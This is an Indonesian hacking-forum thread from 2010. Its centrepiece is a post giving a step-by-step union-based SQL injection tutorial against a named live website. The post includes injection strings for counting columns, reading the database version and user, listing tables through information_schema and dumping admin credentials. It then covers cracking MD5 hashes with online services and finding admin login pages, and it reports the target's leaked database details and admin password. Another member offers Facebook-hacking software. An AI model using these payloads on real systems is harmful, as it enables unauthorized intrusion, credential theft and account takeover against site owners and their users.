Welcome To t0k3k Miring Crew Official Forum
Welcome To t0k3k Miring Crew Official Forum

Silahkan Klik Login Untuk Masuk Di Forum
Atau Klik Register Untuk Menjadi Member Di t0k3k Miring Crew

Welcome To t0k3k Miring Crew Official Forum


 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 The Exploit Database

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: The Exploit Database   Sun Mar 07, 2010 3:27 am

http://www.exploit-db.com/

akses situs tersebut,, dan temukan database exploit terbesar..... Big Grin


Regards,

edelweize

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
sadoelan
Entertainment Moderator
Entertainment Moderator


Jumlah posting : 101
Points : 133
Reputation : 2
Join date : 04.03.10
Age : 24
Lokasi : dunia lain

PostSubyek: Re: The Exploit Database   Sun Mar 07, 2010 6:19 am

wih mantapz....

nice gan....

_________________









http://uuddiieenn007.blogspot.com/


http://id-id.facebook.com/Tenshi.Iruga/
Kembali Ke Atas Go down
Lihat profil user http://uuddiieenn007@yahoo.com
dedux
V.I.P Member
V.I.P Member


Jumlah posting : 87
Points : 103
Reputation : 0
Join date : 01.03.10
Age : 30
Lokasi : Bali

PostSubyek: Re: The Exploit Database   Sun Mar 07, 2010 6:12 pm

hahahaha...Nga ngerti Bad Mood
Kembali Ke Atas Go down
Lihat profil user
koya777
Global Moderator
Global Moderator


Jumlah posting : 43
Points : 54
Reputation : 2
Join date : 07.03.10
Lokasi : /etc/passwd

PostSubyek: Re: The Exploit Database   Mon Mar 08, 2010 1:39 pm

Other Mood

Other Mood

Other Mood

Other Mood

Bad Mood
Kembali Ke Atas Go down
Lihat profil user
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,<jambore tenga>lingkungan 5

PostSubyek: ...............................   Mon Mar 08, 2010 1:47 pm

astaga........................

kalau gini gw kurang tau juga gan.....

soalnya gw hanya mahir dalam HACKING facebook.............................

kalau dalam masalah gini gw masih sedikit belajar kk...................................

ADMIN mohon tambahin daftar forum di depan donk..............................

tentang Facebook,sama dengan di snutz gitu..........................

gw posting softwere Hacking FB.........................

ok?????????????????????

nih nama FB gw : Fox Careleon Mcvaarth
email : perfectfox35@yahoo.com
Kembali Ke Atas Go down
Lihat profil user
Bboy_maverick
Crew Member
Crew Member


Jumlah posting : 99
Points : 124
Reputation : 0
Join date : 08.03.10
Age : 24
Lokasi : manado

PostSubyek: Re: The Exploit Database   Mon Mar 08, 2010 4:21 pm

mantaf bro ...

bisa d'ajarin nggak ...
maklum nak newbie

Other Mood
Kembali Ke Atas Go down
Lihat profil user http://www.microlighthangar.com/forum/messages.asp?iMsg=171&
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,<jambore tenga>lingkungan 5

PostSubyek: Re: The Exploit Database   Mon Mar 08, 2010 4:26 pm

bisa......................

mau belajar tentang apa????
Kembali Ke Atas Go down
Lihat profil user
Bboy_maverick
Crew Member
Crew Member


Jumlah posting : 99
Points : 124
Reputation : 0
Join date : 08.03.10
Age : 24
Lokasi : manado

PostSubyek: Re: The Exploit Database   Mon Mar 08, 2010 6:01 pm

tx yea gan ...
q mw bljr Advance SQL Injection....
bsa nggak gan ...
Kembali Ke Atas Go down
Lihat profil user http://www.microlighthangar.com/forum/messages.asp?iMsg=171&
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,<jambore tenga>lingkungan 5

PostSubyek: nih.............   Mon Mar 08, 2010 7:37 pm

jangan di ejek yah kalo salah........ Big Grin maklum kerjaan newbie.....

guaa langsung kasih live demonya,, guaa gakk mauu jelasin.... capekk dahh.......

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Aurthor : Edelweize a.k.a Rue a.k.a Advance SQL Injector
Method : Advance SQL Injection
Vuln URL : http://hrtemps.org/productInfo.php?productID=115%27
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

1.a Vuln Checking

dengan menambahkan tanda ' [aphostrophie] di akhir URL

Picture Live Demo 1.a Vuln Checking

1.b Vuln Checking [ True And False ]

yaitu dengan +and+1=1 << true, +and+1=2 << false

kalo true,, artikel / produk / apalah,, akan keliatan,, tapi kalo false,, artikel / produk / apalah,, gag akan keliatan.....

Picture Live Demo 1.b Vuln Checking [True]

Picture Live Demo 1.b.a Vuln Checking [ False]

2. Penghitungan Collumn

disini setelah menemukan vulnerebalities di website dan melakukan checking Vuln,, selanjutnya kita akan melakukan Penghitungan Collumn yang gunannya untuk melihat berapa column yang ada di site tsb...

+order+by+[nomer]+--+

skarang guaa kasih contohnya langsung aja yahh.... capekk dahh tinggal di aplod melulu picturenya..

Penghitungan Collumn 1

gag ada errornya tuhh.....

Penghitungan Collumn 2

gag ada juga......

Penghitungan Collumn 3

wadduuhh gag ada juga,....... carii truzz...... Other Mood
langsung jumping aja dahh,, capek..... Big Grin

Penghitungan Collumn 20

wiw,, ada errornya.... Other Mood
tapii belom pasti kalo disitu...

Penghitungan Collumn 19

errornya ada juga.....

Penghitungan Collumn 18

wiw,, gag ada errornya.... Big Grin
hore ketemu columnnya .... Good Mood

jadi columnya ada 18 karna errornya pas di 19...... Big Grin

lannjootttt dahh............... Big Grin


3. Menemukan Vulnerabilities Collumn

disini kita akan mempelajari gimana cara menemukan vulnerabilitie column....
kan pada tahap 2 tadi kita udh menemukan berapa jumlah column yg ada di site itu....
skarang coba dahh kita testing di tabel tsb kalo ada vulnnya.... Big Grin

kata kunci : +union+select+[nomer column]+--+

Live Demo Collumn Vulnerabilities Checking 18

wew....
ada vulnnya......... Big Grin

ada angka 3 yang nongol..... Big Grin
skarang udh dape lubang nya dahh.....

lanjootttt.....................

4. Pengecekan Version, User, Ama Database Website......

setelah mendapatkan vuln column dan angkanya yang nongol.....
skarang kita melakukan checking versi MySQL, user, dan database yang dipakai......

kata kunci : concat(database(),0x3a,user(),0x3a,version())

Q : cara penempatannya gimana..??
A : nih liat,, punya mata kan......

Live Demo Database, User, Version Checking.

database : mbstech_newstore
user : mbstech_mbstech@172.20.10.17
version : 5.0.84-percona-b18-log

nahh,, skarang kan udh dapet versi database ama usernya....
nttuu,, MySQLnya versi 5.... Big Grin
berarti gampang dong nginjeknya.... hehehehhee
kalo versi 4 lebih menjurus pada penebakan.. tapi karna target live demonya berversi 5 jadi belum bisa dijelasin,, pokoknya nanti dahh guaa jelasin kalo ada waktu.....

5. Looking For Table Names, Check This Out..!!

setelah dapetin versi mysqlnya [5] skarng kita akan ingin melihat nama2 tabelnya trus melakukan dumping uname ama passwordnya...... hehehehehe

kata kunci 1 : group_concat(table_name)]
kata kunci 2 : +from+information_schema.tables+--+

tauu cara penempatannya..??
nihh....

Table Names Searching

waduuhh banyak amat...... Bad Mood

mari kita sedikitkan...... hehehehe...... Bad Mood

kata kunci 3 : sama kek kata kunci 1
kata kunci 4 : +from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+

gunanya kata kunci 4 itu untuk mengeluarkan nama2 tabel tanpa memuat tabel informasi....
jadi kita lebih leluasa melihat nama tabel yang mangandung admin.... Big Grin

lanjut.... Big Grin

6. Mengeluarkan Nama Collumn Dari Table

nahh,, setelah kita melihat nama table yang dicurigai mencuri [lho kok mencuri] ekh salah,, mengandung admin.....

kita akan melihat isi collumn tsb utk memastikan bahwa tabel tersebut memang mengandung admin...

kata kunci 1 : group_concat(column_name)
kata kunci 2 : +from+information_schema.columns+where+table_name=0xHEXdariNAMATABEL+--+

skarang sebelum menginject, kita udh menemukan tabel yg keknya mengandung admin....
'admin' (wew.. emang mengandung admin,, namanya aja udh kek gitu)

lalu kata admin kita convert menjadi hex di website ascii converter online ataupun software...

nahh,, ini ascii converter dari t0k3k Miring Crew Forum..

- = [ASCII CONVERTER By Edelweize] = -

selama guaa tauu hex dari admin sih 41646d696e

tapi cobalah test dolo,, mungkin guaa salah kali yah..... hehehehe

7. mengeluarkan isi column

nahh ....
udah mauu abis nihh......... Big Grin

skarang setelah melihat nama column dari table, kita akan mengeluarkan isi column untuk melihat (biasanya sih uname ama pass admin)

langsung aja
kata kunci 1 : concat_ws([isi column])
kata kunci 2 : +from+[namacolumn]+--+

Live Demo Mengeluarkan Isi Column

tuuhh...!!
kalo udah keluar skarang...
kita mengcrack passwordnya.... kenapa..?? karna password itu masih dalam keadaan encrypted...

skarang mari mengcrack..... Big Grin
ini situs2 yang menyediakan fasilitas crack md5...
http://md5crack.com/
http://www.victorike.com/tools/

8. Mencari Halaman Login Admin

naahh.....
setelah md5 hash telah kita crack sekarang kita harus menemukan halaman login adminnya.....

kalo saya sihh sering pake situs ini untuk nyari halaman login admin...
http://mormoroth.net/af/

9. Apakah Yang Akan Dilakukan Selanjutnya...??

iyaaaa.....

setelah menemukan uname ama pass juga admin loginnya,.....
kita tinggal login trus melakukan apa yang harus blackhat lakukan...... Bad Mood
(untung guaa ngga kek mereka, guaa kan newbie... Big Grin)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
End Of Archive
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

btw, yang live demo tadi lohh...... Big Grin
username : admin
password : admin
halaman login admin : carii sendiriii.....!!! Good Mood sdangkan guaa aja gag nemu...... Good Mood

selamat bekerja....
Kembali Ke Atas Go down
Lihat profil user
takecy
V.I.P Member
V.I.P Member


Jumlah posting : 33
Points : 36
Reputation : 1
Join date : 02.03.10
Age : 28
Lokasi : ponorogo

PostSubyek: Re: The Exploit Database   Thu Mar 18, 2010 6:14 am

ijin nyimak gan... Other Mood
Kembali Ke Atas Go down
Lihat profil user http://ponorogozone.com
nevercry
Crew Member
Crew Member


Jumlah posting : 4
Points : 6
Reputation : 0
Join date : 06.03.10
Age : 27
Lokasi : amurang

PostSubyek: Re: The Exploit Database   Sat Mar 20, 2010 3:51 am

ijin bljr yach,.,.,

by bboy nevercry,.,.,.,.

Other Mood Other Mood
Kembali Ke Atas Go down
Lihat profil user
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: The Exploit Database   Sat Mar 20, 2010 9:00 pm

copas tuuuhh....................

baca langsung aja.......

Advance SQL Injection Method By Edelweize

@peforma

kreatip dikit dong...... Good Mood

--- edited ----

@om koya

heeehee,, pura2 nihh umz........ Big Grin

wakkkakkakkakak......

btw, lokasinya menyeramkan dahh........... Very Happy

_________________


Regards,

edelweize


Terakhir diubah oleh edelweize the warlock tanggal Sat Mar 20, 2010 9:02 pm, total 1 kali diubah (Reason for editing : suka aja,, mangnya gag boleh...??)
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
Sponsored content




PostSubyek: Re: The Exploit Database   Today at 5:47 am

Kembali Ke Atas Go down
 
The Exploit Database
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Welcome To t0k3k Miring Crew Official Forum :: Dangerous Zone :: Hacking :: Hacking Tools-
Navigasi: